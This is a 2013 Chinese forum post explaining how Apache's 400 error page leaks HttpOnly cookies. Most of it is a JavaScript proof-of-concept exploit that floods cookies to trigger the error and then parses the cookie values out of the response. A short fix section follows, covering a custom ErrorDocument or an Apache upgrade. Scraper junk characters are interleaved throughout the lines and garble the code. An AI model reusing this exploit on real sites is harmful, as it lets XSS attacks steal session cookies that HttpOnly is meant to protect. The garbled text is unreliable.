很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。. X2 z1 l1 N; N, ~
% i: s" j' Z* \" W1 H/ _# a
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:9 D/ O+ \* U7 L
( x+ n9 Y- S7 ~0 \( T0 b
+ B% _6 Q0 } U X/ w' B7 s$ W// http://www.exploit-db.com/exploits/18442/& }+ \: x; \! i5 V. S3 `
function setCookies (good) {$ P6 d3 j& i D8 b# j3 f0 A
// Construct string for cookie value
% B$ w: B r, r2 d/ ^1 J0 ?var str = "";& ~' y$ z) ^0 _- F6 h
for (var i=0; i< 819; i++) {! p5 c" A3 v% w* n) F
str += "x";
8 d' }& }4 c1 n) x* x7 }}
! |; ]$ w4 a8 G! E6 [3 s- ?- J// Set cookies
% J( k7 h1 K. y, F% V [for (i = 0; i < 10; i++) {
7 D" p, d; D; n- \9 e5 V// Expire evil cookie
: v4 w J3 } R! J. f# uif (good) {2 i' M+ `4 z2 w3 r/ ^
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";$ V3 T) V% c6 @6 Q( g8 w! Q% ~% O
}
$ A5 a. \8 R$ d! y1 V: w Z. h// Set evil cookie0 N: {) o8 L, Q; o: L- i
else {
5 T3 H/ l. [1 {var cookie = "xss"+i+"="+str+";path=/";
1 O% N4 \! b: v}6 d1 N) }, ]1 N
document.cookie = cookie;7 M3 N1 v5 M$ B! Q0 T
}
- [1 W4 `( B6 w' V9 }$ s}5 T1 X# K' \7 o) p& r0 H5 Y
function makeRequest() {) L6 \6 Z, H' _# Q) x
setCookies();! q& G4 g' b* `$ l0 W3 t U) k
function parseCookies () {0 c' X1 N% r. S% H2 S9 X
var cookie_dict = {};
/ m% X# u+ T/ e// Only react on 400 status: J. I0 ^; L: b2 @) O, K
if (xhr.readyState === 4 && xhr.status === 400) {1 |" f4 v9 r6 x1 _
// Replace newlines and match <pre> content2 U# Y6 r M* V5 V; ]
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
3 j& A+ L; Y' mif (content.length) {1 @% B5 m7 N E7 Y0 q2 c
// Remove Cookie: prefix: ^( ~( H8 R- i; a( S% u4 W
content = content[1].replace("Cookie: ", "");5 ^5 D, y. @- s& L
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);; X( v w) v l+ Y1 a9 o; P) P
// Add cookies to object
6 j+ b3 @8 X5 k. c! k3 |( r: \for (var i=0; i<cookies.length; i++) {
6 ], f( }5 r0 A. [" u9 Vvar s_c = cookies.split('=',2);% Y1 ]% V( G* t0 B
cookie_dict[s_c[0]] = s_c[1];
5 r, S9 o: q' \/ r}
: ~# z0 f2 U6 n0 v+ N O$ G}
' o' C4 A$ U% r F2 H& [// Unset malicious cookies6 j/ h' P& u* C, C6 J: c: s
setCookies(true);
v. I) M( O! e n3 m! nalert(JSON.stringify(cookie_dict));+ ]/ h) \$ Z3 G ]& K
}
, S1 ] T2 H& [, S; b$ a& `6 Y}& Y1 w' F+ X) W0 Z3 R
// Make XHR request3 t+ E4 s' C b a$ H/ _: q
var xhr = new XMLHttpRequest();
* L+ c8 K( X) c1 {9 wxhr.onreadystatechange = parseCookies;( I* A5 T' c1 P8 X1 b8 Z
xhr.open("GET", "/", true);/ b# Z7 u0 V# v0 |
xhr.send(null);
8 |- ]9 R4 ?& U: ]* h! G}
& S5 z y' O0 u: Y3 amakeRequest();% M( Q* T' O# m; N/ u
1 y B7 f/ L4 b5 v* n- R/ {
你就能看见华丽丽的400错误包含着cookie信息。5 r7 r' ^ ^) t3 j, g8 {4 ?
; x" q2 M1 @) ^& H9 y
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#, D& N* i+ m2 M+ F$ W0 j
V( @) W" y+ ^ K1 c3 E
修复方案:
: l3 j5 b/ m% \9 [9 l/ W" ]* `3 ~' D
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
" ~9 E4 e! q* w. b7 Q# ]: K1 U2 m' F( w; M; m- e
In the event of a problem or error, Apachecan be configured to do one of four things," C2 K9 d9 A- k! R3 I9 q9 Z, L! u
1 b6 b$ W. v9 o: f0 G0 S- D* C
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息2 [! d' ]% \4 ~& I1 _
2. output acustomized message输出一段信息
. Q7 I3 O+ v; A) u3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 . s- o3 `+ T7 B0 B' i7 O
4. redirect to an external URL to handle theproblem/error转向一个外部URL
# ]0 H/ w. h$ ~3 d; F" ]
0 q# F- @; {; r2 R经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
1 @: }* G- K; @0 J B2 o
$ g* K/ y% y2 \# {2 D$ Q$ NApache配置:: M6 ^' }1 o' f) S0 ~
1 {. J0 e1 i& a( T, L, F, [: [ErrorDocument400 " security test"
9 s& o# q" Y8 q4 [5 H# N* Q2 B
2 u( N7 c. n6 y* X* ? |- J" S当然,升级apache到最新也可:)。
8 V2 t* f5 i5 t# V( @8 H- h3 e% D7 @7 h9 K2 J! z9 d# v% Q" V k5 w/ n
参考:http://httpd.apache.org/security/vulnerabilities_22.html
! ^6 u* f P6 ^6 W
$ v: ~7 R7 V, d- g0 o' U |
发表于 2013-4-19 19:15:43
收藏
支持
反对